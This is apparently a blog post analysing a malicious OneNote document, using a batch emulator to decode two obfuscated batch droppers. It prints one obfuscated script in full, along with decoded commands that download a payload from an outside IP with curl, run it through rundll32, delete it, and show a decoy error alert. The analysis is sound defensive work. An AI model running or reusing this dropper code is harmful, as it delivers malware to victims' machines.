Obfuscated Batch Scripts in OneNote Document

This malicious OneNote document contains two obfuscated batch scripts and we’ll be using our commercial Simple Batch Emulator package to understand what they do.

SHA256: 46149F56028829246628FFAFC58DF81A4B0FF1C87ED6466492E25AD2F23C0A13

We open the first batch script and decode its data to text with the action “Conversion -> Bytes to text” (Ctrl+R).

This is the batch script and as we can see it’s obfuscated.

GIFTS WITH DISCOUNTS >nul 2>&1 LIMITED OFFER
@echo off
echo Opening cloud attachment. Please, wait...

set MTwQKSgpMHQL=l
set kOMmbE=6
set ppriRNqimzzTSvKtXf=w
set xjkkaUqzMsQfwuOvO=N
set KSYAjImqTlEaqaUQk=j
set WpncDVBcWdl=:
set hXZtrthX=a
set tzEroXSbsuwcjP=R
set abwWhsgS=I
set BfVscWaRFhKFCmEn=G
set RFgBUQShCaK=t
set YSnYOZtiQGsHWbQ=\
set TcEDTQuiRCwRnCZ=.
set xClmPsTggJpylvV=e
set vNQWiteQi=~
set gMymvy=P
set "wzLrpmBHLFeDXp=^&"
set OGlxoeCqS=*
set ABCTXVZiIx=_
set xINjhSGoIiH=;
set CJIMOVQWfQXQOdw=T
set LEkBWAERtHbZHi=S
set LmUcrlUYz=X
set rBVcFPRbzVfPfSUyF=5
set FCWmviurmdolmnnUV=-
set UMoZSPjFJvvChEk=K
set QGYQnnwq=0
:: RPrSCzCUAATzV vqyBFMLBqtxnSlKMNs RdYRqenmbofWuRhYlp
set xexBeMXmOc=Y
set RerNvPMjfHYv=Z
set SSDGYSluOaABFTa=n
set Xvmanbnc=O
set BqhoBjkpoCfz=m
set kClPys=k
set EVXBVtuZWFNZFffZx=b
:: oNEHkdpApzcQojnR IkylOzKKzX
set salnQA=p
set IpPOCnYJoXfOpeA=v
set xauJWmnNKt=2
set iWoZxOXHmAlQyPzt=c
set CoXXaBVa=g
set NRQHwqYiLqQu=4
:: CKWYSylZoes byhWiriMNX
set lxegFxhbQBlOmLHpHo=9
set nYfHglKJWerCSSt=r
set vTDYJe=C
set WWBUqZ=A
:: QmKggo Tstispm
set hJOaPhawOaKZnvMvhu=U
set tboSNACgeGqhwKHB=x
set TbpVIiV=E
set XRLcqeXQGEgkGA=8
set chKxzHcuSqepx=f
set palzevPSCdzXI=F
set xqyxFN=,
set MAPaVaaVbcnCMF='
set cXJtyBgFnuLWwwuI=B
set FFbJYLTBUoyJKRNMX=h
set CZkQjeZGaJTFnMiPM=Q
set pdSNFGNiQFiVMb=H
set gIVLuIt=s
set DlvLVqg=W
:: JAbNuDdaMU FjiPpCzO LoheRy
set NkuszVZKTz=y
:: icuthSFXuaC dKsRVQ QmuhKSbMylnFCJoqvI
:: CBIXovGcLEYeZ
set dEDYlv=!
set TFeXZUqf=#
set OTiJUJwllhLt=i
set lHvFElIZMHqJAvGu=/
set LMehDCaBboTb=d
set OdLXhyBHVhmqSXw=%%
set PWMguBlyRx=L
set PgrmAuqfL= 
set sugcUnpjSvvQFACvv=7
set BVteXMgZfztowwMEiA=(
set dGyJnqxqXvDT=J
set ujWMrdCPoYEzMS=u
set lycYegmHsTmEckqeDV=D
set aRJyEodO=q
set XTtRjfHr=3
set YXXTzNnOalV=z
set HOlGVukZ=)
set vTKpxAwRymHcXF=M
set CqhVrRRZOybvn=o
set rcDoYVocath=V
:: wDWaEb NtljhLFEu hbfsdOvuLh
set pYRUIxzT=1
:: VbfcBgnL ImjuXPqMOzmYQnGqm
set sdKHQCulimAwBJR==
if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
set "cjlpmAK=%BqhoBjkpoCfz%%gIVLuIt%%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%hXZtrthX%"
set "znfBpu=%PgrmAuqfL%%KSYAjImqTlEaqaUQk%%hXZtrthX%%IpPOCnYJoXfOpeA%%hXZtrthX%"
set "mOYkTDxIlAGJa=%gIVLuIt%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%%OTiJUJwllhLt%%salnQA%"
set "jLhqMhfFdfqsHmIn=%RFgBUQShCaK%%WpncDVBcWdl%%hXZtrthX%%MTwQKSgpMHQL%%xClmPsTggJpylvV%"
set "SfHNRwvBUb=%nYfHglKJWerCSSt%%RFgBUQShCaK%%BVteXMgZfztowwMEiA%%MAPaVaaVbcnCMF%%hJOaPhawOaKZnvMvhu%"
set "ncTaJBUiFsgEMdQMo=%SSDGYSluOaABFTa%%hXZtrthX%%EVXBVtuZWFNZFffZx%%MTwQKSgpMHQL%%xClmPsTggJpylvV%"
set "WzmDRG=%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%"
set "FMOdiuUuMpBN=%CqhVrRRZOybvn%%SSDGYSluOaABFTa%%SSDGYSluOaABFTa%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%"
set "oYFegi=%RFgBUQShCaK%%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%"
set "EPDdkAFwIo=%RFgBUQShCaK%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%"
set "xkLRLz=%MTwQKSgpMHQL%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%%LMehDCaBboTb%%dEDYlv%"
set "SxfykmrgpDooGMX=%PgrmAuqfL%%vTDYJe%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%"
set "ctDNSwOPEy=%kClPys%%PgrmAuqfL%%NkuszVZKTz%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%"
set "RqozqythPRytu=%nYfHglKJWerCSSt%%PgrmAuqfL%%gIVLuIt%%hXZtrthX%%IpPOCnYJoXfOpeA%"
set "dNaCZTSbGMVlOUMv=%xClmPsTggJpylvV%%LMehDCaBboTb%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%"
set "yqGZymNyMRgpgYItUL=%xClmPsTggJpylvV%%LMehDCaBboTb%%xClmPsTggJpylvV%%SSDGYSluOaABFTa%%RFgBUQShCaK%"
set "IUWWMPjPiDQggIwb=%OTiJUJwllhLt%%hXZtrthX%%MTwQKSgpMHQL%%gIVLuIt%%PgrmAuqfL%"
set "hBhWgfli=%hXZtrthX%%SSDGYSluOaABFTa%%LMehDCaBboTb%%PgrmAuqfL%%nYfHglKJWerCSSt%"
set "CWProZLsDmpnMO=%xClmPsTggJpylvV%%RFgBUQShCaK%%nYfHglKJWerCSSt%%NkuszVZKTz%%TcEDTQuiRCwRnCZ%"
set "SVDRGSmTZXpy=%MAPaVaaVbcnCMF%%HOlGVukZ%%xINjhSGoIiH%%iWoZxOXHmAlQyPzt%%MTwQKSgpMHQL%"
set "lUFINBtqfEeBi=%CqhVrRRZOybvn%%gIVLuIt%%xClmPsTggJpylvV%%BVteXMgZfztowwMEiA%%HOlGVukZ%"
set "DLqlzxL=%xINjhSGoIiH%"
set bKrHQnJgYLkLRdlPfp=%cjlpmAK%%znfBpu%%mOYkTDxIlAGJa%%jLhqMhfFdfqsHmIn%%SfHNRwvBUb%%ncTaJBUiFsgEMdQMo%%WzmDRG%%FMOdiuUuMpBN%%oYFegi%%EPDdkAFwIo%%xkLRLz%%SxfykmrgpDooGMX%%ctDNSwOPEy%%RqozqythPRytu%%dNaCZTSbGMVlOUMv%%yqGZymNyMRgpgYItUL%%IUWWMPjPiDQggIwb%%hBhWgfli%%CWProZLsDmpnMO%%SVDRGSmTZXpy%%lUFINBtqfEeBi%%DLqlzxL%

if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
set "MEiEysS=%iWoZxOXHmAlQyPzt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%MTwQKSgpMHQL%%PgrmAuqfL%"
set "hEEZxQ=%FCWmviurmdolmnnUV%%gIVLuIt%%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%"
set "bSCPqurOBHv=%gIVLuIt%%gIVLuIt%%MTwQKSgpMHQL%%FCWmviurmdolmnnUV%%SSDGYSluOaABFTa%"
set "ENVkYMiFcyLeD=%CqhVrRRZOybvn%%FCWmviurmdolmnnUV%%nYfHglKJWerCSSt%%xClmPsTggJpylvV%%IpPOCnYJoXfOpeA%"
set "yhyKQvxJRAmfMmLrvQ=%CqhVrRRZOybvn%%kClPys%%xClmPsTggJpylvV%%PgrmAuqfL%%FCWmviurmdolmnnUV%"
set "zVnWsFDbegYBO=%FCWmviurmdolmnnUV%%chKxzHcuSqepx%%hXZtrthX%%OTiJUJwllhLt%%MTwQKSgpMHQL%"
set "xEsVgXu=%PgrmAuqfL%"
set xIKbuUril=%MEiEysS%%hEEZxQ%%bSCPqurOBHv%%ENVkYMiFcyLeD%%yhyKQvxJRAmfMmLrvQ%%zVnWsFDbegYBO%%xEsVgXu%
set "GyQPcYnVsENQBwBT=%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%"
set "LQZZUjqMilSGG=%RFgBUQShCaK%%salnQA%%ujWMrdCPoYEzMS%%RFgBUQShCaK%%PgrmAuqfL%"
set "jhqGuvWYATsIiWC="
set SFdNuqILphV=%GyQPcYnVsENQBwBT%%LQZZUjqMilSGG%%jhqGuvWYATsIiWC%
set "ZYxjxzYjLeO=%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%RFgBUQShCaK%%salnQA%%WpncDVBcWdl%"
set "hnigHp=%lHvFElIZMHqJAvGu%%lHvFElIZMHqJAvGu%%lxegFxhbQBlOmLHpHo%%pYRUIxzT%%TcEDTQuiRCwRnCZ%"
set "vVMqMZEfrsRch=%xauJWmnNKt%%xauJWmnNKt%%XRLcqeXQGEgkGA%%TcEDTQuiRCwRnCZ%%pYRUIxzT%"
set "DaDpbPEzhPdJGKKGgR=%QGYQnnwq%%TcEDTQuiRCwRnCZ%%pYRUIxzT%%XTtRjfHr%%NRQHwqYiLqQu%"
set "DtYdKvm=%lHvFElIZMHqJAvGu%%gIVLuIt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%chKxzHcuSqepx%"
set "BJNiXGg=%hXZtrthX%%iWoZxOXHmAlQyPzt%%xClmPsTggJpylvV%%lHvFElIZMHqJAvGu%%KSYAjImqTlEaqaUQk%"
set "bMvXsjUVjZbwIIyde=%xjkkaUqzMsQfwuOvO%%kClPys%%EVXBVtuZWFNZFffZx%%kOMmbE%%lxegFxhbQBlOmLHpHo%"
set "uClHPvlSNy=%kOMmbE%%YXXTzNnOalV%%tboSNACgeGqhwKHB%%WWBUqZ%%Xvmanbnc%"
set "lNLOveFOJabtAtqdjy=%xexBeMXmOc%%ABCTXVZiIx%%ujWMrdCPoYEzMS%%pYRUIxzT%%IpPOCnYJoXfOpeA%"
set "rZMPaKQnRSsL=%NkuszVZKTz%%aRJyEodO%%gIVLuIt%%CqhVrRRZOybvn%%QGYQnnwq%"
set "FVFhwo=%XTtRjfHr%%salnQA%%vTKpxAwRymHcXF%%pYRUIxzT%%tzEroXSbsuwcjP%"
set "kdZZTx=%ppriRNqimzzTSvKtXf%%cXJtyBgFnuLWwwuI%%kOMmbE%%OTiJUJwllhLt%%LmUcrlUYz%"
set "eLhtMYXkdwHI=%kClPys%%lxegFxhbQBlOmLHpHo%%WWBUqZ%%vNQWiteQi%%vNQWiteQi%"
set "BJWSwhpPmVXngzod=%lHvFElIZMHqJAvGu%%ABCTXVZiIx%%aRJyEodO%%MTwQKSgpMHQL%%LmUcrlUYz%"
set "bEwVCCLtCoQNx=%chKxzHcuSqepx%%YXXTzNnOalV%%xjkkaUqzMsQfwuOvO%%KSYAjImqTlEaqaUQk%%UMoZSPjFJvvChEk%"
set "hfpLYvBbEIbrisf=%gIVLuIt%%XTtRjfHr%%OTiJUJwllhLt%%gIVLuIt%%NRQHwqYiLqQu%"
set "UpezsVhTToDIPyd=%RFgBUQShCaK%%ABCTXVZiIx%%QGYQnnwq%%IpPOCnYJoXfOpeA%%dGyJnqxqXvDT%"
set "jPOromFtXDn=%abwWhsgS%%salnQA%%hXZtrthX%%CqhVrRRZOybvn%%BqhoBjkpoCfz%"
set "oKQzltmDjTukIOpV=%RerNvPMjfHYv%%palzevPSCdzXI%%gIVLuIt%%lycYegmHsTmEckqeDV%%xauJWmnNKt%"
set "GJSANIkzMYkizi=%CoXXaBVa%%EVXBVtuZWFNZFffZx%%rcDoYVocath%%FFbJYLTBUoyJKRNMX%%ppriRNqimzzTSvKtXf%"
set "ltLlkobfEXFqnwkYdh=%vNQWiteQi%%vNQWiteQi%%lHvFElIZMHqJAvGu%"
set jfMGIEDYGAgCHHJUgC=%ZYxjxzYjLeO%%hnigHp%%vVMqMZEfrsRch%%DaDpbPEzhPdJGKKGgR%%DtYdKvm%%BJNiXGg%%bMvXsjUVjZbwIIyde%%uClHPvlSNy%%lNLOveFOJabtAtqdjy%%rZMPaKQnRSsL%%FVFhwo%%kdZZTx%%eLhtMYXkdwHI%%BJWSwhpPmVXngzod%%bEwVCCLtCoQNx%%hfpLYvBbEIbrisf%%UpezsVhTToDIPyd%%jPOromFtXDn%%oKQzltmDjTukIOpV%%GJSANIkzMYkizi%%ltLlkobfEXFqnwkYdh%
set "kjamXhOLYpt=%gIVLuIt%%CqhVrRRZOybvn%%LMehDCaBboTb%%SSDGYSluOaABFTa%%NkuszVZKTz%"
set "SMVCxTQcVXzqCYLqR=%BqhoBjkpoCfz%%nYfHglKJWerCSSt%%salnQA%%TcEDTQuiRCwRnCZ%%KSYAjImqTlEaqaUQk%"
set "ZFxCfsVnwlDI=%gIVLuIt%%KSYAjImqTlEaqaUQk%"
set MNbiLHzZgYRjURP=%kjamXhOLYpt%%SMVCxTQcVXzqCYLqR%%ZFxCfsVnwlDI%
set "vMhvNuNL=%nYfHglKJWerCSSt%%ujWMrdCPoYEzMS%%SSDGYSluOaABFTa%%LMehDCaBboTb%%MTwQKSgpMHQL%"
set "aQNPBZPCpHS=%MTwQKSgpMHQL%%XTtRjfHr%%xauJWmnNKt%%PgrmAuqfL%"
set OqroxhdAgfsysPZ=%vMhvNuNL%%aQNPBZPCpHS%
set "IuipCtfGWFReSRk=%xqyxFN%%OTiJUJwllhLt%%SSDGYSluOaABFTa%%OTiJUJwllhLt%%RFgBUQShCaK%"
set "rwYhYAS="
set FdtCBRu=%IuipCtfGWFReSRk%%rwYhYAS%
set "ghStZE=%LMehDCaBboTb%%xClmPsTggJpylvV%%MTwQKSgpMHQL%%PgrmAuqfL%"
set DTyxOFBzvxX=%ghStZE%
%xIKbuUril%%jfMGIEDYGAgCHHJUgC%%SFdNuqILphV%%MNbiLHzZgYRjURP%
%OqroxhdAgfsysPZ%%MNbiLHzZgYRjURP%%FdtCBRu%
%DTyxOFBzvxX%%MNbiLHzZgYRjURP%

%bKrHQnJgYLkLRdlPfp%

We run the batch emulator.

The emulator prints to the output view the result of the emulation.

This is the output:

echo: Opening cloud attachment. Please, wait...
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output sodnymrp.jsj
unsupported command: rundll32 sodnymrp.jsj,init
unsupported command: del sodnymrp.jsj
unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();

As we can see, the script tried to download a file from a URL and then uses “rundll32” to execute the downloaded file. In the end as a decoy it warns the user that it couldn’t connect to the cloud to open the attachment.

We can repeat the same operations with the second script.

The second scripts executes the same operations. The only difference is the file name on disk of the downloaded file

echo: Opening cloud attachment. Please, wait...
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output fjxipv.jah
unsupported command: rundll32 fjxipv.jah,init
unsupported command: del fjxipv.jah
unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();

Leave a Reply

Your email address will not be published. Required fields are marked *